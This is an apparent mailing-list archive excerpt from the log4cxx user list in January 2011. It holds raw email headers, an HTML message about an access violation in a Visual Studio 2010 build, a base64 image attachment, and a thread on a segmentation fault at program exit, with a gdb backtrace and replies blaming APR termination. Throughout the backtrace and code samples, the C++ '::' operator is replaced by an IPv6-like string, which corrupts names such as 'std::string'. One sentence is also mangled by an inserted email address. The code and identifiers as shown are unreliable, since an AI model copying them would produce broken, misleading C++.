011"><meta http-equiv=3DContent-Type = content=3D"text/html; charset=3Dus-ascii"><meta name=3DGenerator = content=3D"Microsoft Word 12 (filtered medium)"><style><!-- /* Font Definitions */ @font-face {font-family:"Cambria Math"; panose-1:2 4 5 3 5 4 6 3 2 4;} @font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4;} /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {margin:0in; margin-bottom:.0001pt; font-size:12.0pt; font-family:"Calibri","sans-serif"; color:black;} h1 {mso-style-priority:9; mso-style-link:"Heading 1 Char"; margin-top:24.0pt; margin-right:0in; margin-bottom:0in; margin-left:0in; margin-bottom:.0001pt; page-break-after:avoid; font-size:16.0pt; font-family:"Calibri","sans-serif"; color:black;} h2 {mso-style-priority:9; mso-style-link:"Heading 2 Char"; margin-top:10.0pt; margin-right:0in; margin-bottom:0in; margin-left:0in; margin-bottom:.0001pt; page-break-after:avoid; font-size:14.0pt; font-family:"Calibri","sans-serif"; color:black; font-weight:normal;} h3 {mso-style-priority:9; mso-style-link:"Heading 3 Char"; margin-top:10.0pt; margin-right:0in; margin-bottom:0in; margin-left:0in; margin-bottom:.0001pt; page-break-after:avoid; font-size:13.0pt; font-family:"Calibri","sans-serif"; color:black; font-weight:normal;} h4 {mso-style-priority:9; mso-style-link:"Heading 4 Char"; margin-top:10.0pt; margin-right:0in; margin-bottom:0in; margin-left:0in; margin-bottom:.0001pt; page-break-after:avoid; font-size:14.0pt; font-family:"Calibri","sans-serif"; color:black; font-weight:normal;} h5 {mso-style-priority:9; mso-style-link:"Heading 5 Char"; margin-top:10.0pt; margin-right:0in; margin-bottom:0in; margin-left:0in; margin-bottom:.0001pt; page-break-after:avoid; font-size:13.0pt; font-family:"Calibri","sans-serif"; color:black; font-weight:normal;} h6 {mso-style-priority:9; mso-style-link:"Heading 6 Char"; margin-top:10.0pt; margin-right:0in; margin-bottom:0in; margin-left:0in; margin-bottom:.0001pt; page-break-after:avoid; font-size:11.0pt; font-family:"Calibri","sans-serif"; color:black; font-weight:normal;} a:link, span.MsoHyperlink {mso-style-priority:99; color:#6666FF; text-decoration:underline;} a:visited, span.MsoHyperlinkFollowed {mso-style-priority:99; color:#993333; text-decoration:underline;} span.EmailStyle17 {mso-style-type:personal-compose; color:black;} span.Heading1Char {mso-style-name:"Heading 1 Char"; mso-style-priority:9; mso-style-link:"Heading 1"; font-family:"Times New Roman","serif"; color:black; font-weight:bold;} span.Heading2Char {mso-style-name:"Heading 2 Char"; mso-style-priority:9; mso-style-link:"Heading 2"; font-family:"Times New Roman","serif"; color:black;} span.Heading3Char {mso-style-name:"Heading 3 Char"; mso-style-priority:9; mso-style-link:"Heading 3"; font-family:"Arial","sans-serif"; color:black;} span.Heading4Char {mso-style-name:"Heading 4 Char"; mso-style-priority:9; mso-style-link:"Heading 4"; font-family:"Arial","sans-serif"; color:black;} span.Heading5Char {mso-style-name:"Heading 5 Char"; mso-style-priority:9; mso-style-link:"Heading 5"; font-family:"Arial","sans-serif"; color:black;} span.Heading6Char {mso-style-name:"Heading 6 Char"; mso-style-priority:9; mso-style-link:"Heading 6"; font-family:"Arial","sans-serif"; color:black;} .MsoChpDefault {mso-style-type:export-only;} @page WordSection1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in;} div.WordSection1 {page:WordSection1;} --></style><!--[if gte mso 9]><xml> <o:shapedefaults v:ext=3D"edit" spidmax=3D"1026" /> </xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext=3D"edit"> <o:idmap v:ext=3D"edit" data=3D"1" /> </o:shapelayout></xml><![endif]--></head><body bgcolor=3Dwhite = background=3D"cid:[email protected]" lang=3DEN-US = link=3D"#6666FF" vlink=3D"#993333"><img = src=3D"cid:[email protected]" = v:src=3D"cid:[email protected]" v:shapes=3D"_x0000_Mail" = width=3D0 height=3D0 class=3Dshape = style=3D'display:none;width:0;height:0'><!--[if gte mso 9]><xml> <v:background id=3D"_x0000_s1025" o:bwmode=3D"white" = o:targetscreensize=3D"800,600"> <v:fill src=3D"cid:[email protected]" o:title=3D"radbkgnd" = type=3D"frame" /> </v:background></xml><![endif]--><div class=3DWordSection1><p = class=3DMsoNormal>When trying to implement log4cxx we are having the = following problem with the log4cxx.dll built using visual studio = 2010:<o:p></o:p></p><p class=3DMsoNormal><o:p>&nbsp;</o:p></p><p = class=3DMsoNormal>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&= nbsp;&nbsp; when making the IMPLEMENT_LOG4CXX_OBJECT(OBJECT)&nbsp; call = following exception is thrown:&nbsp; <o:p></o:p></p><p = class=3DMsoNormal>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&= nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n= bsp;&nbsp; 0xC0000005: Access violation reading location = 0x007d5000.<o:p></o:p></p><p class=3DMsoNormal><o:p>&nbsp;</o:p></p><p = class=3DMsoNormal>It looks like it may be related to the = log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blassRegistration call.&nbsp; <o:p></o:p></p><p = class=3DMsoNormal>If anyone has any insight to this problem it would be = greatly appreciated.<o:p></o:p></p><p class=3DMsoNormal><span = style=3D'font-size:11.0pt;font-family:"Calibri","sans-serif"'><o:p>&nbsp;= </o:p></span></p><p class=3DMsoNormal><span = style=3D'font-size:11.0pt;font-family:"Calibri","sans-serif"'>Best = regards,<o:p></o:p></span></p><p = class=3DMsoNormal><o:p>&nbsp;</o:p></p><p = class=3DMsoNormal>Rob<o:p></o:p></p></div></body></html> ------=_NextPart_001_00E3_01CBB19D.10136740-- ------=_NextPart_000_00E2_01CBB19D.10136740 Content-Type: image/gif; name="image001.gif" Content-Transfer-Encoding: base64 Content-ID: <[email protected]> R0lGODlhkAEsAYD/AP///8zM/ywAAAAAkAEsAUAC/4SPqcvtD6OctNqLs968+w+G4kiW5omm6sq2 7gvH8kzX9o3n+s73/g8MCofEovGITCqXzKbzCY1Kp9Sq9YrNarfcrvcLDovH5PIjYE5r0eq2+91g h+Xwuptuz+v3/L7/DxgoOEhYaHiImKi4WIjH+Ag54RhJWZkwaZkJianZ6fkJGio66sVJegpnirrK 2uqi6voF6zlLWkt1m5kbm7XL++j7KzxMXAwQbJzMg6zcTMPsHP2BRi1tfY2drb3N3e39DR4uPk5e bn5uBI2+zt7u/g5vXs2oHl9Vb5/vgK/f38TvA6A/ENSqGTyG8KDChAwXzhsIMaLEie8EUryIkZzF jP/dNnLU5vGjyJEkS4YKaTKlSk0oMzpsCPOlzJg0Z9qsifOmzpw8A+z82TMo0JmtWq5EYPRP0kFL fzQ9KuMp1KlUq1rtIfWq1q1IsnL9Cjas2LFky5o9izat2rVs27p9Czeu3Ll069p1ifCuM696+/r9 Cziw4MGE6/A9urDTYbWLnzSW+7jwm8g4KBO23AKzZKSbUWnm8LmzaMSjS5s+jTq16tVsQ7N+DTs2 Edeyl9CuneQ27iO6dxfp7XsI8OBAhhM/jjy58uXMmysx7jy6dNXQp8Oobp04djHbQbvqzg48LmPi vRclVr5D+ijry7XPDv/E+/jT6NunOP++hvz6L/D/71/BfwBKIOCAZxi4RYEIMrRgg1Io6OCBEZYy IYUVcgHhhQpkqCFnHfbyIYghXsFhiCV+eGKHKWq44oUtVvjihDFGOKODNTZ444I5IrijgT0O+COA QfY3pH5F3nfkSEMJxeSSQ/nUZJROSknllFZWieVOd1io0o0vJgnIl1xadaKYXHFo5lcQpglWgWyG 9d+bcLI35lj5ySnWfHjm6cSefDLh55yA1ukjodRlGZNPVy6KqE5QMgppozS5AyYiD4HEWF57QUae XZUu8NSnq4ga6mCionDqL6mKsGp0rTr36lx8xQrXYrQud2s0uW7oG3iY7WoNdKEBe41utxGLDWWX /wY0IonNtYosN6lGK60e1HZkx7XYphJfktp+c+S34LYh7rhplAsbuq+pyxq75nJXKLzxguHuoc3e cy+++U5Rb2r9ovbvaQGbNnBpBY92sGgJd7bwZg1L9nBhEW+T4sSYruFighljDKPGHXMso8chg7wv FBYLdnJgKQO2sq5dtLwphiU/ODOdNTt2M845/4MjvTrOsTPPQds2r89CkgFzX0nrtfRdTXs6NNHd bumZpJFebXXWCimqdddYJ2bA03WJTRfZskb9HNq5Mfeq2cCEqXZXcfMWHLFux3V3rXOns/dvfc/2 t3AOn3SZLSyzkrfI352N3lrLdspn4gx87XXllAhfbjmigcNVAAA7 ------=_NextPart_000_00E2_01CBB19D.10136740-- From [email protected] Mon Jan 17 23:20:33 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 19431 invoked from network); 17 Jan 2011 23:20:33 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 17 Jan 2011 23:20:33 -0000 Received: (qmail 79682 invoked by uid 500); 17 Jan 2011 23:20:33 -0000 Delivered-To: [email protected] Received: (qmail 79546 invoked by uid 500); 17 Jan 2011 23:20:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 79538 invoked by uid 99); 17 Jan 2011 23:20:32 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 17 Jan 2011 23:20:32 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_HELO_PASS,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO moutng.kundenserver.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 17 Jan 2011 23:20:24 +0000 Received: from frodo.mittelerde (p5B23FE47.dip.t-dialin.net [161.129.204.104]) by mrelayeu.kundenserver.de (node=mrbap0) with ESMTP (Nemesis) id 0Lkioe-1QCvbj3vBE-00aV1D; Tue, 18 Jan 2011 00:20:04 +0100 Received: from frodo (localhost [161.129.204.104]) by frodo.mittelerde (Postfix) with ESMTP id 67202A4039 for <[email protected]>; Tue, 18 Jan 2011 00:15:46 +0100 (CET) Date: Tue, 18 Jan 2011 00:15:46 +0100 From: Andreas Volz <[email protected]> To: [email protected] Subject: Crash at exit Message-ID: <20110118001546.04f846d1@frodo> X-Mailer: Claws Mail 3.6.1 (GTK+ 2.16.1; i486-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-Provags-ID: V02:K0:rvImCrc1KfQwNvaDCdpMIKylLcdljzQu8z79X3fg+Nk R71xlDpROW944wemINALdYeppdw4xseAXiC4DF0WeruPTG0GuO C7Zm7QAWZMZr4QzEV8qdjO/XymJmbCQy7q0OroI6CbCj6epJLD Lu1uC1X5qDoEYnLJUzPPdbu7KlzVjvT8iDwLDu7nN24fkyeqTQ 8I7o2c05WT8k2HwqJQFrw== X-Virus-Checked: Checked by ClamAV on apache.org Hello, I just started with using log4cxx. It's a nice logging library and I like using it. But for some reason I get a crash at exiting my program. I run it in the debugger and here is the result: Program received signal SIGSEGV, Segmentation fault. 0x001b2614 in ~ObjectPtrT (this=0x80ef7b8, __in_chrg=<value optimized out>) at /usr/include/log4cxx/helpers/objectptr.h:100 100 p->releaseRef(); (gdb) bt #0 0x001b2614 in ~ObjectPtrT (this=0x80ef7b8, __in_chrg=<value optimized out>) at /usr/include/log4cxx/helpers/objectptr.h:100 #1 0x0093d2cf in stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8b_Rb_tree<stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstring, stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpair<stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstring const, stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bvector<log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectPtrT<log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLogger>, stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8ballocator<log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectPtrT<log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLogger> > > >, stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8b_Select1st<stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpair<stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstring const, stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bvector<log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectPtrT<log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLogger>, stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8ballocator<log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectPtrT<log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLogger> > > > >, stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bless<stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstring>, stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8ballocator<stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpair<stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstring const, stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bvector<log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectPtrT<log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLogger>, stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8ballocator<log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectPtrT<log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLogger> > > > > >acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b_M_erase(stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8b_Rb_tree_node<stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpair<stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstring const, stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bvector<log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectPtrT<log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLogger>, stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8ballocator<log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectPtrT<log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLogger> > > > >*) () from /usr/lib/liblog4cxx.so.10 #2 0x0093b4a4 in log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bHierarchyacf:4db6:5e0b:f386:43a5:35d7:718d:3c8b~Hierarchy() () from /usr/lib/liblog4cxx.so.10 #3 0x00961b75 in log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectImplacf:4db6:5e0b:f386:43a5:35d7:718d:3c8breleaseRef() const () from /usr/lib/liblog4cxx.so.10 #4 0x00939972 in log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bHierarchyacf:4db6:5e0b:f386:43a5:35d7:718d:3c8breleaseRef() const () from /usr/lib/liblog4cxx.so.10 #5 0x009561f7 in log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bspiacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bultRepositorySelectoracf:4db6:5e0b:f386:43a5:35d7:718d:3c8b~DefaultRepositorySelector() () from /usr/lib/liblog4cxx.so.10 #6 0x00961b75 in log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectImplacf:4db6:5e0b:f386:43a5:35d7:718d:3c8breleaseRef() const () from /usr/lib/liblog4cxx.so.10 #7 0x0091d832 in log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bspiacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bultRepositorySelectoracf:4db6:5e0b:f386:43a5:35d7:718d:3c8breleaseRef() const () from /usr/lib/liblog4cxx.so.10 #8 0x00956099 in log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectPtrT<log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bspiacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRepositorySelector>acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b~ObjectPtrT() () from /usr/lib/liblog4cxx.so.10 #9 0x00702588 in __cxa_finalize (d=0xa0338c) at cxa_finalize.c:56 #10 0x009001e4 in ?? () from /usr/lib/liblog4cxx.so.10 #11 0x009adcd0 in _fini () from /usr/lib/liblog4cxx.so.10 #12 0x0011e216 in _dl_fini () at dl-fini.c:248 #13 0x007021bf in __run_exit_handlers (status=0, listp=0x829324, run_list_atexit=true) at exit.c:78 #14 0x0070222f in *__GI_exit (status=0) at exit.c:100 #15 0x006e9bde in __libc_start_main (main=0x806124d <main>, argc=1, ubp_av=0xbfffee54, init=0x80636a0 <__libc_csu_init>, fini=0x8063690 <__libc_csu_fini>, rtld_fini=0x11e030 <_dl_fini>, ---Type <return> to continue, or q <return> to quit--- stack_end=0xbfffee4c) at libc-start.c:258 #16 0x080534f1 in _start () Maybe it's a problem how I use log4cxx. I defined a stupid wrapper class for my project: http://codepad.org/EWDVx8mE This helps me to cut down dependencies (e.g. for a win32 build where no development happens). Then I use the Logger object like this: in the application: // all needed includes and namespaces direct ... PropertyConfiguratoracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bonfigure (searchDataDir () + "/logging.prop"); and then the wrapper in the library (only cpp files!) static Logger logger ("stateval.StateMachineThread"); void MyClassacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bmyFucntion () { LOG4CXX_TRACE (logger, "a trace"); } The logging works, but it [email protected]... I won't like to put Logger as member in the Header files to cut down dependencies. And it needs to be static for sure... So have you any ideas what I made wrong here? Have you any experiences how you organise your logger variables in your source code? regards Andreas From [email protected] Tue Jan 18 08:17:54 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 35531 invoked from network); 18 Jan 2011 08:17:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jan 2011 08:17:54 -0000 Received: (qmail 6050 invoked by uid 500); 18 Jan 2011 08:17:54 -0000 Delivered-To: [email protected] Received: (qmail 5817 invoked by uid 500); 18 Jan 2011 08:17:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 5798 invoked by uid 99); 18 Jan 2011 08:17:48 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 18 Jan 2011 08:17:48 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.am-soft.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 18 Jan 2011 08:17:43 +0000 Envelope-To: [email protected] Received: from tschoening-nb.potsdam.am-soft.de (p578bc5dd.dip0.t-ipconnect.de [161.129.204.104]) by mail.am-soft.de (Postfix) with ESMTP id 632FB6A6 for <[email protected]>; Tue, 18 Jan 2011 09:17:21 +0100 (CET) Date: Tue, 18 Jan 2011 09:17:22 +0100 From: =?windows-1252?Q?Thorsten_Sch=F6ning?= <[email protected]> Organization: AM-SoFT IT-Systeme X-Priority: 3 (Normal) Message-ID: <[email protected]> To: "Log4CXX User" <[email protected]> Subject: Re: Crash at exit In-Reply-To: <20110118001546.04f846d1@frodo> References: <20110118001546.04f846d1@frodo> MIME-Version: 1.0 Content-Type: text/plain; charset=windows-1252 Content-Transfer-Encoding: quoted-printable Guten Tag Andreas Volz, am Dienstag, 18. Januar 2011 um 00:15 schrieben Sie: > Program received signal SIGSEGV, Segmentation fault. > 0x001b2614 in ~ObjectPtrT (this=3D0x80ef7b8, __in_chrg=3D<value optimized= out>) > at /usr/include/log4cxx/helpers/objectptr.h:100 > 100 p->releaseRef(); Sounds that the following may be the reason: http://mail-archives.apache.org/mod_mbox/logging-log4cxx-dev/200901.mbox/%3= [email protected]%3E http://[email protected]/msg03188.html Mit freundlichen Gr=FC=DFen, Thorsten Sch=F6ning --=20 Thorsten Sch=F6ning AM-SoFT IT-Systeme - Hameln | Potsdam | Leipzig =20 Telefon: Potsdam: 0331-743881-0 E-Mail: [email protected] Web: http://www.am-soft.de AM-SoFT GmbH IT-Systeme, Konsumhof 1-5, 14482 Potsdam Amtsgericht Potsdam HRB 21278 P, Gesch=E4ftsf=FChrer: Andreas Muchow From [email protected] Tue Jan 18 08:41:14 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52609 invoked from network); 18 Jan 2011 08:41:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jan 2011 08:41:13 -0000 Received: (qmail 48140 invoked by uid 500); 18 Jan 2011 08:41:13 -0000 Delivered-To: [email protected] Received: (qmail 47832 invoked by uid 500); 18 Jan 2011 08:41:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 47811 invoked by uid 99); 18 Jan 2011 08:41:09 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 18 Jan 2011 08:41:09 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,RCVD_IN_DNSWL_LOW,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO mail-fx0-f47.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 18 Jan 2011 08:41:03 +0000 Received: by fxm17 with SMTP id 17so6695585fxm.34 for <[email protected]>; Tue, 18 Jan 2011 00:40:42 -0800 (PST) Received: by 161.129.204.104 with SMTP id r18mr1191294muh.5.1295340041998; Tue, 18 Jan 2011 00:40:41 -0800 (PST) MIME-Version: 1.0 Received: by 161.129.204.104 with HTTP; Tue, 18 Jan 2011 00:40:21 -0800 (PST) In-Reply-To: <[email protected]> References: <20110118001546.04f846d1@frodo> <[email protected]> From: Oscar Pernas <[email protected]> Date: Tue, 18 Jan 2011 09:40:21 +0100 Message-ID: <[email protected]> Subject: Re: Crash at exit To: Log4CXX User <[email protected]> Content-Type: multipart/alternative; boundary=0016e657b670111136049a1adb82 X-Virus-Checked: Checked by ClamAV on apache.org --0016e657b670111136049a1adb82 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable I had the same problem. In my case, It was caused because log4cxx uses APR libraries, and in my project I was using too. Are you using APR in your project? are you making a apr_terminate in your code? Regards 2011/1/18 Thorsten Sch=F6ning <[email protected]> > Guten Tag Andreas Volz, > am Dienstag, 18. Januar 2011 um 00:15 schrieben Sie: > > > Program received signal SIGSEGV, Segmentation fault. > > 0x001b2614 in ~ObjectPtrT (this=3D0x80ef7b8, __in_chrg=3D<value optimiz= ed > out>) > > at /usr/include/log4cxx/helpers/objectptr.h:100 > > 100 p->releaseRef(); > > Sounds that the following may be the reason: > > > http://mail-archives.apache.org/mod_mbox/logging-log4cxx-dev/200901.mbox/= %[email protected]%3E > http://[email protected]/msg03188.html > > Mit freundlichen Gr=FC=DFen, > > Thorsten Sch=F6ning > > -- > Thorsten Sch=F6ning > AM-SoFT IT-Systeme - Hameln | Potsdam | Leipzig > > Telefon: Potsdam: 0331-743881-0 > E-Mail: [email protected] > Web: http://www.am-soft.de > > AM-SoFT GmbH IT-Systeme, Konsumhof 1-5, 14482 Potsdam > Amtsgericht Potsdam HRB 21278 P, Gesch=E4ftsf=FChrer: Andreas Muchow > > --=20 =D3scar Pernas Plaza. --0016e657b670111136049a1adb82 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable I had the same problem. In my case, It was caused because log4cxx uses APR = libraries, and in my project I was using too. Are you using APR in your pro= ject? are you making a apr_terminate in your code?<div><br></div><div>Regar= ds<br> <br><div class=3D"gmail_quote">2011/1/18 Thorsten Sch=F6ning <span dir=3D"l= tr">&lt;<a href=3D"mailto:[email protected]">[email protected]</a>&= gt;</span><br><blockquote class=3D"gmail_quote" style=3D"margin:0 0 0 .8ex;= border-left:1px #ccc solid;padding-left:1ex;"> Guten Tag Andreas Volz,<br> am Dienstag, 18. Januar 2011 um 00:15 schrieben Sie:<br> <div class=3D"im"><br> &gt; Program received signal SIGSEGV, Segmentation fault.<br> &gt; 0x001b2614 in ~ObjectPtrT (this=3D0x80ef7b8, __in_chrg=3D&lt;value opt= imized out&gt;)<br> &gt; =A0 =A0 at /usr/include/log4cxx/helpers/objectptr.h:100<br> &gt; 100 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 p-&gt;releaseRef();<br= > <br> </div>Sounds that the following may be the reason:<br> <br> <a href=3D"http://mail-archives.apache.org/mod_mbox/logging-log4cxx-dev/200= [email protected]%3E" target=3D"_blank">http://= mail-archives.apache.org/mod_mbox/logging-log4cxx-dev/200901.mbox/%3C497515= [email protected]%3E</a><br> <a href=3D"http://[email protected]/msg0= 3188.html" target=3D"_blank">http://www.mail-archive.com/log4cxx-user@loggi= ng.apache.org/msg03188.html</a><br> <br> Mit freundlichen Gr=FC=DFen,<br> <br> Thorsten Sch=F6ning<br> <br> --<br> Thorsten Sch=F6ning<br> AM-SoFT IT-Systeme - Hameln | Potsdam | Leipzig<br> <br> Telefon: Potsdam: 0331-743881-0<br> E-Mail: =A0<a href=3D"mailto:[email protected]">[email protected]</= a><br> Web: =A0 =A0 <a href=3D"http://www.am-soft.de" target=3D"_blank">http://www= .am-soft.de</a><br> <br> AM-SoFT GmbH IT-Systeme, Konsumhof 1-5, 14482 Potsdam<br> Amtsgericht Potsdam HRB 21278 P, Gesch=E4ftsf=FChrer: Andreas Muchow<br> <br> </blockquote></div><br><br clear=3D"all"><br>-- <br>=D3scar Pernas Plaza.<b= r> </div> --0016e657b670111136049a1adb82-- From [email protected] Tue Jan 18 09:44:34 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 84043 invoked from network); 18 Jan 2011 09:44:34 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jan 2011 09:44:34 -0000 Received: (qmail 73058 invoked by uid 500); 18 Jan 2011 09:44:34 -0000 Delivered-To: [email protected] Received: (qmail 72863 invoked by uid 500); 18 Jan 2011 09:44:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 72855 invoked by uid 99); 18 Jan 2011 09:44:31 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 18 Jan 2011 09:44:31 +0000 X-ASF-Spam-Status: No, hits=1.5 required=10.0 tests=FREEMAIL_FROM,HTML_MESSAGE,RCVD_IN_DNSWL_LOW,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-pv0-f175.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 18 Jan 2011 09:44:27 +0000 Received: by pvd12 with SMTP id 12so1051252pvd.34 for <[email protected]>; Tue, 18 Jan 2011 01:44:07 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:in-reply-to:references:date :message-id:subject:from:to:content-type; bh=bJFQJX2kOpLHYeeZWLmYoumbRYkSVEYeDe5M4ebBgz8=; b=uzZSsAkVLet9zgcRVQ3qoi+u+mV01+pQCOZEyHW+0sfBPGSB01I/ml098PDP4nu7zr N7PN4bdG/BozKoODC0VUZJbFUOhQ929aYWU4ZOquoqpmpLEbtBnx6peVr41cMItMeGX0 